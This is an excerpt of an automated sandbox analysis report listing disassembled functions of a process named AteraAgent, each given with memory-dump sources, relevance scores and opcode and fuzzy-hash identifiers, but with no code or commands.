                                                                                                                                                                                                                                                                                                • Instruction ID: 6b0275e1c5424e6d9fc76885504f5902ca064b57a26f8f6af0c4ac72c65fa11b
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1cac296bd5d1bdaf72b511d5d2737a75abd17eee4b5495244c0eee7d68774151
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D0D10770E0E68D8FEB91EBA488655EDBFF0EF1A310F1501FED049DB1A2CA285944CB51
                                                                                                                                                                                                                                                                                                Function 00007FFD9B378379 Relevance: .4, Instructions: 365COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000C.00000002.1763237049.00007FFD9B370000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B370000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_12_2_7ffd9b370000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: d450f570f6fc4a3864fa663a4b94e6844c2c7602b9ef25aa1248f863a63f69cf
                                                                                                                                                                                                                                                                                                • Instruction ID: b94ec132ccd8a6b707b9124bd3fc34ffdea782a4de3855018b26b74141b7b62b
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d450f570f6fc4a3864fa663a4b94e6844c2c7602b9ef25aa1248f863a63f69cf
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8CE19570A09A1D8FDBA8EB58C498BADB7F1FF59301F1541A9D04DE72A1DB759A80CF00
                                                                                                                                                                                                                                                                                                Function 00007FFD9B460001 Relevance: .3, Instructions: 346COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000C.00000002.1763506251.00007FFD9B460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B460000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_12_2_7ffd9b460000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: 2f1e9421c913999191f74468ae9185342f0bbc49ac124a2e77241210e19dd681
                                                                                                                                                                                                                                                                                                • Instruction ID: 663c912466b86d0f3e2afaaf85be4ed733baa5e2f71d269a89ef4e081a024099
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2f1e9421c913999191f74468ae9185342f0bbc49ac124a2e77241210e19dd681
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 98A13A71B0EB898FD766CB6C98B55747BE1EF56714B0A01FFD08AC72A7D914AC028342
                                                                                                                                                                                                                                                                                                Function 00007FFD9B373368 Relevance: .3, Instructions: 337COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000C.00000002.1763237049.00007FFD9B370000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B370000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_12_2_7ffd9b370000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: 45cea5e58742da51b23ff047f57c127c9d0843421df6532807a23361ea6bd18c
                                                                                                                                                                                                                                                                                                • Instruction ID: 43b15dbd3c056e1f9a673d6927dd040da55714e497e3c446a1fc06a1c3618a6a
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 45cea5e58742da51b23ff047f57c127c9d0843421df6532807a23361ea6bd18c
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 75C18170A0E65D8FEBA5EB68C4A47A8B7F1EF15300F1501BEC04DD72A1DA796E81CB01
                                                                                                                                                                                                                                                                                                Function 00007FFD9B37D7BE Relevance: .3, Instructions: 332COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000C.00000002.1763237049.00007FFD9B370000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B370000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_12_2_7ffd9b370000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: 501fafbd00252cb8bcb66e3d40f41a59a760e4f348d3372fcd7c07a73fe321f4
                                                                                                                                                                                                                                                                                                • Instruction ID: 0c311ae508c23a1dc527508ba6f0b66b085c73921e376cf02c8799bb3ca63212
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 501fafbd00252cb8bcb66e3d40f41a59a760e4f348d3372fcd7c07a73fe321f4
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E6C1D770A09A5D8FDF94EF58C894BA8BBF1FF69301F1141AAD00DE7265DB70A981CB41
                                                                                                                                                                                                                                                                                                Function 00007FFD9B37C536 Relevance: .3, Instructions: 332COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000C.00000002.1763237049.00007FFD9B370000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B370000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_12_2_7ffd9b370000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: 024ec60012ad4523f03d5272b20075c1960c1299b5f1483eec67cda24a0dd3c3
                                                                                                                                                                                                                                                                                                • Instruction ID: 80dabc15af7c6cde21e611dfd96711aed32dc6400b94c827e6304e1925b37f60
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 024ec60012ad4523f03d5272b20075c1960c1299b5f1483eec67cda24a0dd3c3
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A6B1C730609A8D4FEB68EF28C8957E93BE1FF55310F44426EE84DC7296CB749945CB82
                                                                                                                                                                                                                                                                                                Function 00007FFD9B371B2F Relevance: .3, Instructions: 251COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000C.00000002.1763237049.00007FFD9B370000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B370000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_12_2_7ffd9b370000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: eaa275e2e6fb8c6c57c777d96a6f6f494b1949d65b4db8795e2c52b9500f13c0
                                                                                                                                                                                                                                                                                                • Instruction ID: f2191abe0c2c8f83c1f28df05e6c14b6edc8c4a8b1734934dcd4c13122c86dd0
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: eaa275e2e6fb8c6c57c777d96a6f6f494b1949d65b4db8795e2c52b9500f13c0
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 53A16A31E1962D8FEBA5EE18C8947E8B3B1EF59341F1541F9D00DA72A1CA75AE84CF00
                                                                                                                                                                                                                                                                                                Function 00007FFD9B37E641 Relevance: .2, Instructions: 202COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000C.00000002.1763237049.00007FFD9B370000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B370000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_12_2_7ffd9b370000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: 6bd8318eca7aea44e18eceb0e859a2a68f74d576a7879dfb50991bc79f6ac8bd
                                                                                                                                                                                                                                                                                                • Instruction ID: c0aa06f42d12f3ff509555f8d4ba9011081dd0389b1aa3af0a42c51ce477d51b
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6bd8318eca7aea44e18eceb0e859a2a68f74d576a7879dfb50991bc79f6ac8bd
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5D613A34E0995D8FDF98EFA8C4A5AEDBBB5FF59300F150469D00AE72A1DA34A940CB50
                                                                                                                                                                                                                                                                                                Function 00007FFD9B37946C Relevance: .2, Instructions: 193COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000C.00000002.1763237049.00007FFD9B370000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B370000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_12_2_7ffd9b370000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: a9e6f5f01e3c34db6131faf3588531d1f7d9d0a9f923745fe209980674f67f0f
                                                                                                                                                                                                                                                                                                • Instruction ID: 2f4fdd7a7bbb44c0ddd26301dbc631145db87787be78a52fad2fbd8c2e1547f3
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a9e6f5f01e3c34db6131faf3588531d1f7d9d0a9f923745fe209980674f67f0f
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4B517230918A1C8FDB68DF58D855BE9BBF1FB59310F1082AAD44DD3296CE34A9858B81
                                                                                                                                                                                                                                                                                                Function 00007FFD9B4604E1 Relevance: .2, Instructions: 162COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000C.00000002.1763506251.00007FFD9B460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B460000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_12_2_7ffd9b460000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: ead51e37e68da5d820f6bd7929c5365a0fb2b162f4ee5d02fad9cce06c09b336
                                                                                                                                                                                                                                                                                                • Instruction ID: 7f26dcd00ef69606abdd8f080b56d18673059d33797c4f25648cee4a5800320a
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ead51e37e68da5d820f6bd7929c5365a0fb2b162f4ee5d02fad9cce06c09b336
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3F411622B0EBC94FE796977C48A65643BE1EF6661430A01FBC089C72F7DC18AC069341
                                                                                                                                                                                                                                                                                                Function 00007FFD9B3759E8 Relevance: .2, Instructions: 160COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000C.00000002.1763237049.00007FFD9B370000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B370000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_12_2_7ffd9b370000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: 9df0169810de7bceefd26c212e7240a9996f5cbb61ca083e1ff7b119cd5a13f5
                                                                                                                                                                                                                                                                                                • Instruction ID: 2f5d6799919f7fa74c0cea29a3f60baa6250a3c38357338a4c10be0c553aa27a
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9df0169810de7bceefd26c212e7240a9996f5cbb61ca083e1ff7b119cd5a13f5
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 03512531E0E64E4FE7BEFAA448E11B877D0EF55351F1701BED009C76E1EE286A058661
                                                                                                                                                                                                                                                                                                Function 00007FFD9B37D20F Relevance: .1, Instructions: 110COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000C.00000002.1763237049.00007FFD9B370000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B370000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_12_2_7ffd9b370000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: 87123c66fa66854f977911379210b3c3b0fc806659f84591514dc968924d39d0
                                                                                                                                                                                                                                                                                                • Instruction ID: 4875cb666e8878641754073f7b9f734b195d7b9dabb7d78df90c2d29767aa974
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 87123c66fa66854f977911379210b3c3b0fc806659f84591514dc968924d39d0
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7931F670E1990DDFDB94EBA8C4A5AACB7B1FF59301F5101B9D00DE72A1DA38A942CB00
                                                                                                                                                                                                                                                                                                Function 00007FFD9B37D12B Relevance: .1, Instructions: 98COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000C.00000002.1763237049.00007FFD9B370000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B370000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_12_2_7ffd9b370000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: 5fd99a2cf8a608161313fb42c5fa87791422cfeabae7fc064b58e172bbf14d17
                                                                                                                                                                                                                                                                                                • Instruction ID: de1c2b8a96d1cd16b9967178e9fbadf7172ad63fcb71d168ce82911b664ad543
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5fd99a2cf8a608161313fb42c5fa87791422cfeabae7fc064b58e172bbf14d17
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 26318171A1EA8D9FDF91EBA8C4A4AECBBF0FF59300F0501BAD049D71A2CA246945C701
                                                                                                                                                                                                                                                                                                Function 00007FFD9B377DC1 Relevance: .1, Instructions: 94COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000C.00000002.1763237049.00007FFD9B370000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B370000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_12_2_7ffd9b370000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: e8f5e878d61a1149890b86d0b14f6fe59dc05e6be86b1640539d4c8409ad42e2
                                                                                                                                                                                                                                                                                                • Instruction ID: 76f5d94c5ce9957246460eacc3838fc11520dc08df18b0969f407742a105d2d8
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e8f5e878d61a1149890b86d0b14f6fe59dc05e6be86b1640539d4c8409ad42e2
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9F319370E19A4C9FDB91EBA8C855AECBBF0FF19310F0500BAD008D7196DA345944C741
                                                                                                                                                                                                                                                                                                Function 00007FFD9B374EFA Relevance: .1, Instructions: 93COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000C.00000002.1763237049.00007FFD9B370000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B370000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_12_2_7ffd9b370000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: ff508d2b46de588d07ee8e48abdde85d617088ded5601346023858adc072ed2c
                                                                                                                                                                                                                                                                                                • Instruction ID: 7abcaee838305d00d72862750e358c27f57d9b9b8d67f35a52c68a02ef60bbd8
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ff508d2b46de588d07ee8e48abdde85d617088ded5601346023858adc072ed2c
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9C212732B0E69D0FDB11EF68A8B15DA7BA0FF45310B0502BBD458C32A3CD646806C391
                                                                                                                                                                                                                                                                                                Function 00007FFD9B37E6D9 Relevance: .1, Instructions: 81COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000C.00000002.1763237049.00007FFD9B370000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B370000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_12_2_7ffd9b370000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: 8671934c7dd7e5e59cc692ba2797e71d357905d07340f9bb0d1d92d6a021947c
                                                                                                                                                                                                                                                                                                • Instruction ID: 8b0f628428b906f7c7d51964c329588d1a9ccabffa9d5a96f909f16283dcf1df
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8671934c7dd7e5e59cc692ba2797e71d357905d07340f9bb0d1d92d6a021947c
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0E215C30A0966D8FDB58EFA8D861AFEB7B5FF45300F0501AEE00AD72A1CB346950CB50
                                                                                                                                                                                                                                                                                                Function 00007FFD9B3779CC Relevance: .1, Instructions: 68COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000C.00000002.1763237049.00007FFD9B370000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B370000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_12_2_7ffd9b370000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: f1ec79cb6db9cd1d801288648d9c64c06cc7f8298b556bbe4978a5e76a561d0a
                                                                                                                                                                                                                                                                                                • Instruction ID: 715128409fe8ce1903a48adbb4d38c59ab994e0694bd2b85d1d197e54e949145
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f1ec79cb6db9cd1d801288648d9c64c06cc7f8298b556bbe4978a5e76a561d0a
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3E110662F1A98D5FE794F7DC48619ADFBE0DF45240F4101BAE008D7296CE542C014352
                                                                                                                                                                                                                                                                                                Function 00007FFD9B37483D Relevance: .1, Instructions: 63COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000C.00000002.1763237049.00007FFD9B370000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B370000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_12_2_7ffd9b370000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: 6a04a2950bcda06a420be1124bbde15e4c1c11703af5237fdde19410f2fba456
                                                                                                                                                                                                                                                                                                • Instruction ID: 3b6715fd1d32366cfec28ccd69809d5b99f9a9b2a6567041de6ecf91b3cfdc3a
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6a04a2950bcda06a420be1124bbde15e4c1c11703af5237fdde19410f2fba456
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1A11A322A0A6DD1BE721FFA899E12ED3BA0FF42314F0505BED458871E3DD2579568281
                                                                                                                                                                                                                                                                                                Function 00007FFD9B373B7D Relevance: .1, Instructions: 62COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000C.00000002.1763237049.00007FFD9B370000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B370000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_12_2_7ffd9b370000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: 51b9467750394033d32c03a9208b372586a457ed1796790c1d8a3f3801d9a359
                                                                                                                                                                                                                                                                                                • Instruction ID: a7fae2559daa9fb777e7c1ace08b9a3951f9b031f48b75be624fcaa91187d156
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 51b9467750394033d32c03a9208b372586a457ed1796790c1d8a3f3801d9a359
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 50110371E0D68D8FEB55EBA4C4616FDBBB0EF41300F0102B9D108EB1D2DE7866458B41
                                                                                                                                                                                                                                                                                                Function 00007FFD9B3732C5 Relevance: .0, Instructions: 44COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000C.00000002.1763237049.00007FFD9B370000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B370000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_12_2_7ffd9b370000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: 7e9e1441497be4df614b238272e4e9460588bbeb9b692aa85a654fe2eaabf003
                                                                                                                                                                                                                                                                                                • Instruction ID: 5be28893cf7e31a132306754c0eee0c143201a294798dba7dff4747c5cc30e6a
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7e9e1441497be4df614b238272e4e9460588bbeb9b692aa85a654fe2eaabf003
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 00018670D0954D8FDB60EFA4C4556FDFBB1EF4A305F11417AC048E3191CA389644CB40
                                                                                                                                                                                                                                                                                                Function 00007FFD9B374A52 Relevance: .0, Instructions: 20COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000C.00000002.1763237049.00007FFD9B370000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B370000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_12_2_7ffd9b370000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: 5143e1eec4400a9dcf67eb9ac88671a6b0d4f70ae67595fbbae44e25e72ef590
                                                                                                                                                                                                                                                                                                • Instruction ID: 4d24b186963af05ea04c011b29614583f92750c2b439428a8965a2b438467053
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5143e1eec4400a9dcf67eb9ac88671a6b0d4f70ae67595fbbae44e25e72ef590
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 57E0BF3460664D8FD794EF64C4A57A977A2FF46300F92447CD41DC7292CE36A941C700
                                                                                                                                                                                                                                                                                                Function 00007FFD9B376E93 Relevance: .0, Instructions: 6COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000C.00000002.1763237049.00007FFD9B370000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B370000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_12_2_7ffd9b370000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: eabf0ebf242b1f382babf5f70d85575b7ddcc87bd615f60048b4d0bed50bbf83
                                                                                                                                                                                                                                                                                                • Instruction ID: f5f8036ae21da44438c19fa1f0c37fa75284c8992a51959deebe5b8c0f438a3e
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: eabf0ebf242b1f382babf5f70d85575b7ddcc87bd615f60048b4d0bed50bbf83
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 169002419CF46E01D454709538B24D47144C745120BC76465EC0C85157989E1ED60185

                                                                                                                                                                                                                                                                                                Executed Functions

                                                                                                                                                                                                                                                                                                Function 00007FFD9B380C58 Relevance: 12.5, Strings: 9, Instructions: 1233COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2400332822.00007FFD9B380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B380000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ffd9b380000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
